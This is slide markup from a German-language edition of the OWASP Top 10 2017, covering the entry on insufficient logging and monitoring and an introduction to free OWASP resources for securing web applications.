                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>AppSensor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WebApp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Firewalls wie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>ModSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t> mit dem OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>ModSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t> Core </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>Rule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t> Set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> und geeignete Protokollanalyse-Werkzeuge inkl. Alarmierung.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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A10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="75600"/>
            <a:ext cx="5486400" cy="738000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Unzureichendes</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Logging &amp; Monitoring</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2356509514"/>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900" b="1" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Ausnutzbarkeit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="500" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="105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1">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err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Verbreitung</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="105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err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Auffindbarkeit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="105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1100" b="0" kern="1200" baseline="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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1000" b="1" baseline="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technisch</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="105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gn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Das</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Ausnutzen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> unzureichender Protokollierungs- und Monitoring-Maßnahmen ist der Ausgangspunkt fast aller größerer Sicherheitsvorfälle.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Angreifer nutzen fehlendes Monitoring und verzögerte Antwortzeiten auf Vorfälle dazu aus, unentdeckt Angriffe durchzuführen.</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l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Dieser Eintrag in den Top 10 basiert auf einer </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId17"/>
                        </a:rPr>
                        <a:t>Umfrage unter</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId17"/>
                        </a:rPr>
                        <a:t> Sicherheitsexpert</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId17"/>
                        </a:rPr>
                        <a:t>en</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Eine mögliche</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Strategie, um herauszufinden, ob Ihre Monitoring-Maßnahmen ausreichend sind, ist es, die </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" baseline="0" noProof="0" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Logging</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-Einträge Ihres Systems nach einem Penetrationstest zu überprüfen. Die Aktivitäten des Testers sollten so protokolliert worden sein, das Sie daraus mögliche Schäden identifizieren können.</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="900" noProof="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l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:tabLst>
                          <a:tab pos="1980000" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Den meisten erfolgreichen Angriffen gehen Schwachstellen-Scans</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> voraus. Wenn solche Scans nicht abgewehrt werden, besteht ein fast 100 prozentiges Risiko für erfolgreiche Angriffe.	</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="de-DE" sz="900" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Die Zeit bis zur Aufdeckung eines Einbruchs lag 2016 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId18"/>
                        </a:rPr>
                        <a:t>durchschnittlich bei 191</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId18"/>
                        </a:rPr>
                        <a:t> Tagen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> – viel Zeit, um Ihren Systemen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Schaden zuzufügen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="900" noProof="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8"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2680349583"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="939600"/>
          <a:ext cx="6854400" cy="8966400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6854400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="342780">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>U</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" kern="1200" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>mfassende Sicherheitsmaßnahmen </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>etablieren und</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" kern="1200" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> nutzen</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="1100" b="1" kern="1200" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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3620">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de-DE" sz="950" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Egal ob man ein Neuling im Bereich der Webanwendungssicherheit ist oder schon mit den erläuterten Gefahren vertraut ist – die Entwicklung einer neuen sicheren Webanwendung oder das Absichern einer bereits existierenden kann sehr schwierig sein. Für die Betreuung eines großen Anwendungsportfolios kann das sehr abschreckend sein.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Um Organisationen und Entwicklern dabei zu helfen Ihre Anwendungssicherheitsrisiken kostengünstig zu reduzieren, stellt OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" u="none" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>zahlreiche </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" u="sng" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>kostenlose und frei zugängliche</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" u="none" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Ressourcen </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>zur Verbesserung der Anwendungssicherheit zur Verfügung. Im Folgenden werden einige dieser OWASP-Ressourcen, die Organisationen helfen können sichere Webanwendungen oder APIs zu erstellen, vorgestellt. Auf der nächsten Seite stellen wir einige OWASP-Ressourcen vor, die Organisationen dabei helfen können Ihre Anwendungssicherheit zu überprüfen.</a:t>
                      </a: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de-DE" sz="950" baseline="0" noProof="0" dirty="0">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de-DE" sz="950" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Es stehen zahlreiche weitere OWASP Ressourcen zur Verfügung. Besuchen Sie die </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Projects</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-Übersicht, die eine Liste aller </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Flagship</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" noProof="0" dirty="0">
